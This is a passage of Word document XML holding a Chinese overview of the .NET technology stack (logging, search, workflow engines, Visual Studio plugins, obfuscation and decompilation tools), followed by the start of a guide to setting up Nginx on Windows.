          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Quartz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开源的作业调度框架，是Quartz的C#移植版本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>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日志记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Log4net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从java平台下移植过来的非常优秀的日志记录框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nlog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相对于Log4net，配置更为简单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Microsoft.Framework.Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET5中的日志框架集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174"/>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搜索引擎</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lucene.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是Lucene的.net移植版本，它不是一个完整的全文检索引擎，而是一个全文检索引擎的架构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ElasticSearch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="180"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是基于Lucene架构面向企业搜索应用的扩展，提供了一个分布式多用户能力的全文搜索引擎，基于RESTful web接口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>盘古分词</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中文分词组件，作者肖波</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HubbleDotNet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="182"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开源数据库全文搜索引擎，作者肖波</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>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工作流引擎(Workflow - WF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Business Process Management - BPM 业务流程管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows Workflow Foundation - WWF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>微软的工作流产品，提供一套工作流引擎和VS解决方案自带的流程设计器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NetBPM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="185"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从JBpm1移植到.NET平台下的开源工作流项目</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CCFlow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="186"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>国产开源工作流</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.Net常用工具及插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Colorful-IDE：可以更换VS的壁纸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/erlandranvinge/ReAttach" \t "http://www.cnblogs.com/1996V/p/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ReAttach：可以快速附加到进程（开源）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C# Outline：VS代码块折叠插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reshaper：即时分析代码质量，消除错误，安全地更改代码库等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OzCode：VS调试时候的辅助插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LINQ Pad：用来测试Linq查询的插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://rextester.com/" \t "http://www.cnblogs.com/1996V/p/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Rextester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：在线测试C#代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SmartAssembly：.Net加密混淆工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ConfuserEx：.Net加密混淆工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ILSpy：.Net反编译工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reflector ：.Net反编译工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:widowControl/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="526" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:widowControl/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="526" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:widowControl/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="526" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:widowControl/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="526" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>总结归纳不易，如果有疑问或异解请留言给我。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:widowControl/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="526" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后面我会写一些文章来让大家系统的学习web开发，而这篇技术栈我也会不断更新。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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 .Net web交流群， QQ群：166843154 欲望与挣扎</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>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Nginx</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows环境下的Nginx环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>到Nginx官网上下载（http://nginx.org/en/download.html），这里我选择的是1.12.2(不知怎么的我1.14.0怎么也启动不了）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>将文件解压缩（路径全英文），启动cmd命令（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注意：这里必须用管理员权限才能启动它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用CD命令进入根目录输入nginx.exe -t即可开启</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>重启命令是nginx.exe -s reload 关闭命令是nginx.exe -s stop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>另外还要设置下打印日志的配置，可以参考https://blog.csdn.net/qq_35624642/article/details/71056890写的很详细。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
